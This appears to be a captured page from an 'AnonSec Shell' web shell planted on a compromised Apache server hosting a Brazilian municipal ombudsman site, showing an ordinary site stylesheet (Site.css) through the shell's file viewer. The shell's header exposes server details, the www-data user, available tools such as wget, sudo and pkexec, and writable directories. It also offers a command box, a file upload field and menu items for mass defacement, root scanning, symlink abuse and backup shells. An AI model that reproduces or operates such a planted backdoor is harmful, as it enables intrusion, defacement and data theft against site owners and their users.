AnonSec Shell
Server IP : 20.75.53.88  /  Your IP : 216.73.217.72   [ Reverse IP ]
Web Server : Apache
System : Linux VMRALP-3 4.4.0-256-generic #290~14.04.1-Ubuntu SMP Thu Jun 20 09:24:50 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29+esm15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Domains : 3 Domains
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/ouvidoria/pmcrateus/css/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/html/ouvidoria/pmcrateus/css/Site.css
@font-face {
    font-family: 'AlegreyaSansSC-Bold';
    src: url("../fonts/AlegreyaSansSC-Bold.ttf");
}

@font-face {
    font-family: 'AlegreyaSansSC-Regular';
    src: url("../fonts/AlegreyaSansSC-Regular.ttf");
}

@font-face {
    font-family: 'airstrip four';
    src: url("../fonts/airstrip.ttf");
}

@font-face {
    font-family: 'Chunk';
    src: url("../fonts/Chunk.ttf");
}

html {
    font-family: 'AlegreyaSansSC-Regular';
}

div {
    font-family: 'AlegreyaSansSC-Regular';
}

body {
    background: url(../img/fundo_tij.jpg) no-repeat center center fixed;
    padding-top: 0px;
    padding-bottom: 20px;
    background-size: 100%;
    margin: 0;
    font-family: 'AlegreyaSansSC-Regular';
}

select:hover, textarea:hover {
    background: #ffffff;
    border: 1px solid #4b6c9e;
}

th {
    font-family: 'AlegreyaSansSC-Regular';
}

strong {
    font-family: 'AlegreyaSansSC-Regular' !important;
}

section {
    font-family: 'AlegreyaSansSC-Regular';
}

tr {
    font-family: 'AlegreyaSansSC-Regular';
    font-size: 12px;
}

.lm {
    text-transform: uppercase;
}

.cfb {
    color: #ffffff;;
}

.texto_centro {
    text-align: center;
}

.oculto {
    display: none;
}

p {
    font-family: 'AlegreyaSansSC-Regular';
}

strong {
    font-family: 'tahoma, verdana, arial, sans-serif';
}

span {
    font-family: 'AlegreyaSansSC-Regular';
}

a {
    font-family: 'AlegreyaSansSC-Regular';
    font-size: 15px;
}

.header {
    font-family: Arial, Sans-Serif;
    color: #888888;
    font-weight: bold;
    height: 80px; /*box-shadow: 1px 3px 3px 4px black;*/
    border-radius: 2px; /*background-color:Silver;*/
    /*background-image: url('../img/logogt.png');*/
    background-size: 100px;
    background-repeat: no-repeat;
    background-attachment: inherit;
    background-position: center right;
    cursor: pointer;
    position: inherit;
}

.logo {
    opacity: 0.9;
    width: 110px;
    margin-top: 2px;
    margin-bottom: 0px;
    border-radius: 7px;
}

.logo2 {
    padding: 40px;
    opacity: 0.9;
    margin-top: 2px;
    margin-bottom: 0px;
    border-radius: 7px;
}

.centro {
    text-align: center;
    align: middle;
}

.esquerda {
    text-align: center;
}

.direita {
    text-align: right;
}

.centralizado {
    height: 300px;
    display: flex;
    align-items: center;
}

/*#pop{
    display:none;
    position:absolute;
    top: auto;
    padding:10px;
    width:500px;
    height:400px;
    z-index: 9999;
    border-width: 3px;
    }*/

#pop-preparacao {
    display: none;
    position: absolute;
    top: auto;
    padding: 10px;
    width: 500px;
    height: 400px;
    z-index: 9999;
    border-width: 3px;
}

.centro_div {
    position: absolute;
    top: 45%;
    left: 42%;
    margin-top: -100px;
    margin-left: -125px;
    z-index: -1;
}

.atalho {
    font-size: 12px;
    font-weight: bold;
    color: rgb(66, 137, 200);
    text-align: right;
}

/*//PISCAR*/
.piscar {
    color: #FFF;
    -webkit-animation-name: blinker;
    -webkit-animation-duration: 1s;
    -webkit-animation-timing-function: linear;
    -webkit-animation-iteration-count: infinite;
    -moz-animation-name: blinker;
    -moz-animation-duration: 1s;
    -moz-animation-timing-function: linear;
    -moz-animation-iteration-count: infinite;
    animation-name: blinker;
    animation-duration: 1s;
    animation-timing-function: linear;
    animation-iteration-count: infinite;
}

@-moz-keyframes blinker {
    0% {
        opacity: 1.0;
    }
    50% {
        opacity: 0.0;
    }
    100% {
        opacity: 1.0;
    }
}

@-webkit-keyframes blinker {
    0% {
        opacity: 1.0;
    }
    50% {
        opacity: 0.0;
    }
    100% {
        opacity: 1.0;
    }
}

@keyframes blinker {
    0% {
        opacity: 1.0;
    }
    50% {
        opacity: 0.0;
    }
    100% {
        opacity: 1.0;
    }
}

a.link:link {
    text-decoration: none;
    font-size: 17px;
}

a.link:visited {
    text-decoration: none;
    font-size: 17px;
}

a.link:hover {
    text-decoration: none;
    font-size: 17px;
}

a.link:active {
    text-decoration: none;
    font-size: 17px;
}

a.linkp:link {
    text-decoration: none;
    font-size: 12px;
}

a.linkp:visited {
    text-decoration: none;
    font-size: 12px;
}

a.linkp:hover {
    text-decoration: none;
    font-size: 12px;
}

a.linkp:active {
    text-decoration: none;
    font-size: 12px;
}

/*//PISCAR*/

.esquerda {
    float: right;
    width: 200px;
}

.notice {
    padding: 8px;
    background-color: #fafafa;
    border-left: 6px solid #7f7f84;
    margin-bottom: 10px;
    -webkit-box-shadow: 0 5px 8px -6px rgba(0, 0, 0, .2);
    -moz-box-shadow: 0 5px 8px -6px rgba(0, 0, 0, .2);
    box-shadow: 0 5px 8px -6px rgba(0, 0, 0, .2);
}

.notice-sm {
    padding: 10px;
    font-size: 80%;
}

.notice-lg {
    padding: 35px;
    font-size: large;
}

.notice-success {
    border-color: #80D651;
}

.notice-success > strong {
    color: #80D651;
}

.notice-info {
    border-color: #45ABCD;
}

.notice-info > strong {
    color: #45ABCD;
}

.notice-warning {
    border-color: #FEAF20;
}

.notice-warning > strong {
    color: #FEAF20;
}

.notice-danger {
    border-color: #d73814;
}

.notice-danger > strong {
    color: #d73814;
}

Anon7 - 2022
AnonSec Team